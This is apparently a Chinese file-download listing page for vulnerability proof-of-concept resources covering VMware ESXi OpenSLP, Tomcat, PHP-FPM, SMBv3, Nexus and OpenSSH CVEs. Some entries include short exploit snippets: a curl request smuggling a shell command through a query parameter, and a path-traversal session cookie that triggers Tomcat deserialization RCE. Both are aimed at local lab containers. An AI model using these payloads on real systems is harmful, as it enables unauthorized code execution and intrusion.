Advertisement

VMware ESXi OpenSLP PoCs: CVE-2020-3992与CVE-2019-5544

  •  5星
  •     浏览量: 0
  •     大小:None
  •      文件类型:None


简介:
本文探讨了在VMware ESXi中发现的安全漏洞CVE-2020-3992和CVE-2019-5544,分析了OpenSLP服务中的潜在威胁,并提供了概念验证代码以加深理解。 VMware ESXI OpenSLP PoC CVE-2020-3992 和 CVE-2019-5544 在 VMware Workstation 上安装的 ESXi 环境中进行了测试。如果在真实的机器上进行测试,则可能需要更改 srvtype 字段(服务:VMwareInfrastructure)。

全部评论 (0)

还没有任何评论哟~
客服
客服
  • VMware ESXi OpenSLP PoCs: CVE-2020-3992CVE-2019-5544
    优质
    本文探讨了在VMware ESXi中发现的安全漏洞CVE-2020-3992和CVE-2019-5544,分析了OpenSLP服务中的潜在威胁,并提供了概念验证代码以加深理解。 VMware ESXI OpenSLP PoC CVE-2020-3992 和 CVE-2019-5544 在 VMware Workstation 上安装的 ESXi 环境中进行了测试。如果在真实的机器上进行测试,则可能需要更改 srvtype 字段(服务:VMwareInfrastructure)。
  • CVE-2020-1938: 漏洞复现CVE-2020-1938
    优质
    本文章详细介绍如何复现CVE-2020-1938漏洞,为Apache Struts 2的安全研究人员和开发人员提供深入的技术指导。 CVE-2020-1938漏洞复现利用脚本:环境包括apache-tomcat-8.5.32、java和powershell;实验环境使用python启动tomcat,通过执行sh ./startup.sh来完成。请注意,该工具仅用于安全研究及内部自查目的,严禁将其用于非法攻击行为,任何由此造成的后果由使用者自行承担。
  • Docker CVE-2019-11043
    优质
    CVE-2019-11043是针对Docker容器运行时引擎的安全漏洞,该漏洞可能允许攻击者在目标系统上执行任意代码,影响了Docker服务的广泛使用和安全性。 带有易受攻击的PHP-FPM版本(CVE-2019-11043)和nginx的docker映像可以通过以下命令运行:`docker run --rm -p8080:80 akamajoris/cve-2019-11043`。随后,您应该能够通过浏览器访问Web应用程序。 开发人员从相关仓库构建了二进制文件,并执行如下操作: ``` root@debian:~/gopath/bin# curl localhost:8080/?a=/bin/sh+-c+which+which root@debian:~/gopath/bin# ./phuip-fpizdam http://localhost:8080/index.php 2019/10/24 08:53:00 Base status code is 200 2019/10/24 08:53:00 Status... ``` 以上是关于如何使用该docker映像和执行特定命令的说明。
  • Jackson 新漏洞曝光(CVE-2019-14361和CVE-2019-14439)
    优质
    近期,安全研究人员发现并报告了影响Jackson库的两个新漏洞(CVE-2019-14361、CVE-2019-14439),可能让攻击者进行远程代码执行。建议用户尽快更新至最新版本以防护潜在威胁。 Jackson官方GitHub仓库发布了两个安全问题,涉及漏洞CVE-2019-14361和CVE-2019-14439,这两个问题是针对先前的CVE-2019-12384漏洞进行绕过的手段。当用户提交一个精心构造的恶意JSON数据到Web服务器时,可能会导致远程任意代码执行的风险。阿里云应急响应中心建议Jackson的用户尽快采取安全措施来防止此类攻击的发生。
  • CVE-2020-0796-PoC.py
    优质
    CVE-2020-0796-PoC.py 是一个针对Windows SMB远程代码执行漏洞(SMBGhost)的概念验证脚本,用于检测系统是否易受攻击。 微软SMBv3远程代码执行漏洞(在SMB 3.1.1协议处理压缩消息的过程中,由于缺乏安全检查直接使用数据,可能导致内存破坏问题,进而被攻击者利用来实现无权限远程代码执行)可能造成严重后果。一旦系统开机并联网,就有可能遭受入侵。该漏洞的危险程度与“永恒之蓝”系列相类似,存在被WannaCry等勒索软件使用的风险。攻击者可以通过构造特定网页、压缩文件包、共享目录或Office文档等多种方式触发此漏洞进行攻击,对受影响的Windows主机构成严重威胁。
  • OpenSSH漏洞(CVE-2020-15778, CVE-2018-15473, CVE-2018-15919)修复指南
    优质
    本指南针对CVE-2020-15778、CVE-2018-15473及CVE-2018-15919三个OpenSSH漏洞,提供详细的修复步骤和安全建议,帮助用户加强系统防护。 升级到OpenSSH 8.4可以修复低版本中的安全漏洞。为了完成此次升级,请确保安装以下软件包:openssl-1.1.1g、openssh-8.4p1以及zlib-1.2.11。
  • 源码-CVE-2020-9484
    优质
    源码-CVE-2020-9484提供关于CVE-2020-9484漏洞的详细解析与利用代码,帮助安全研究人员深入理解该漏洞的工作原理及其潜在影响。 CVE-2020-9484(Tomcat) 仅用于教育目的。 运行以下命令: ``` $ git clone https://github.com/masahiro331/CVE-2020-9484.git $ cd CVE-2020-9484 $ docker build -t tomcat:groovy . $ docker run -d -p 8080:8080 tomcat:groovy ``` 开发时使用: ``` $ curl http://127.0.0.1:8080/index.jsp -H Cookie: JSESSIONID=../../../../../usr/local/tomcat/groovy ``` 查看文件: ``` $ docker exec -it $CONTAINER /bin/sh $ ls /tmp/rce ```
  • CVE-2020-0796-POC-Master.zip
    优质
    CVE-2020-0796-POC-Master.zip 是一个针对Windows SMBv3协议中存在的远程代码执行漏洞(CVE-2020-0796)的测试概念验证文件,主要用于安全研究人员进行漏洞分析与防护研究。 在SMB 3.1.1协议处理压缩消息的过程中,如果不对数据进行安全检查而直接使用,则可能导致缓冲区溢出的问题,并可能被攻击者利用以执行远程任意代码。默认情况下,SMBV3通信过程中会启用压缩/解压缩机制。在这种场景下,攻击者可以在SMB压缩转换包的协议头中控制OriginalSize值,使该值设置为一个非常大的数值并写入固定大小的缓冲区,从而引发缓冲区溢出问题。通过精心构造数据包,可以执行恶意命令。具体来说,在进行解压操作时申请的内存空间小于实际需要的空间会导致缓冲区溢出的情况发生。
  • CVE-2019-7238脚本.py
    优质
    这段Python代码是针对CVE-2019-7238漏洞的利用脚本,旨在帮助安全研究人员测试系统的脆弱性并进行防护措施验证。 CVE-2019-7238 是 Nexus Repository Manager 3 在版本 3.15.0 之前存在的无需认证的远程代码执行漏洞,该漏洞由腾讯安全yun ding实验室和[@voidfyoo](https://twitter.com/voidfyoo)发现。重写后的内容如下: Nexus Repository Manager 3 版本小于 3.15.0 存在一个无需身份验证即可利用的远程代码执行漏洞 (CVE-2019-7238),此漏洞由腾讯安全Yunding实验室和一位名为voidfyoo的安全研究人员发现。
  • CVE-2020-2551(压缩包)
    优质
    CVE-2020-2551是一种影响Windows操作系统的安全漏洞,存在于Microsoft Windows的压缩实用程序中,可能允许攻击者远程执行代码。此漏洞与处理特殊构建的自解压可执行文件有关。建议用户及时更新系统以修补该漏洞。 复现CVE-2020-2551的过程涉及多个步骤和技术细节。首先需要确保环境配置正确,并安装必要的工具和软件。然后进行漏洞验证,通过构造特定的请求来触发该漏洞。在测试过程中需要注意安全措施,避免对实际系统造成影响。 接下来是分析阶段,在理解了漏洞原理之后可以尝试编写利用代码或脚本以自动化复现过程。最后一步是对整个实验结果进行全面评估,并记录下所有观察到的行为和数据以便进一步研究或者提交给相关方作为报告的一部分内容。